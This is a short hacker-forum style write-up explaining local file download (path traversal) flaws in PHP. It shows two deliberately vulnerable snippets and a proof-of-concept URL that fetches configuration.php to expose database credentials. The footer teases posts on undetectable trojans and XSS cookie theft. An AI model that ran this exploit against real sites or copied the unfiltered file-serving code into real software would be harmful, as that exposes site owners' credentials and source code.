1 What's Local File Download(LFD)?
- Local file download is kind of misconfigured web master or webdeveloper on php application.
2 Effect
2.1 Personal/website
- You will able to view all php source code in plain text.
- php source code is such as mysql connection data, eg: host, username, password and database
3 vulnerable source code
- Example 1
<?php
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=".$_GET['tbdsec']);
echo file_get_contents($_GET['tbdsec']);
?>
- Example 2
<?php
$filename = $_GET['hmsec'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header("Content-Type: application/octet-stream");
header("Content-Type: application/download");
header("Content-Disposition: attachment; filename=".basename($filename).";");
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($filename));
@readfile($filename);
exit(0);
?>
4 Proof of Concept
- http://localhost/tbdsec.php?hmsec=configuration.php
- Download it, and open it.
- Walla! you able to all code in that page!
5 Patch code
- To admin/webmaster ask your web developer fix it :D
6 Suggestion
- Please don't you direct download, at least filter it.
7 Dork?
- No DORK For Script Kiddies
8 Thanks/Credits
- TDBSecurity(www.tbd.my<http://www.tbd.my>)
- HMSecurity(www.hmsecurity.org<http://www.hmsecurity.org>)
- Ahli Syurga Crew
- XShimeX
- Suhz
- And Google :D
Author: Ahlspiess
Local File Download Theory
December 29, 2009
0 Comments
Explore More
Detecting and Preventing Social Engineering and other Hacking Processes
Social engineering attacks are growing fast, and today majority of attackers use social engineering techniques to infiltrate into a victim’s network. It is very difficult for a technician to identify
Methods of Making Your Trojans/Bots F/Undetecable
1. Crypters/Binders. This is By far the most Common Way to Make Your Trojan Undetectable. Almost everyone Who Makes There Trojans Undetectable Uses a Public Crypter, My First Public Crypter,
XSS Stealing Cookies
This method (XSS attacks) is for get the cookies users, so, for get information of users… and then, login into the account of the victim user…u will have to give
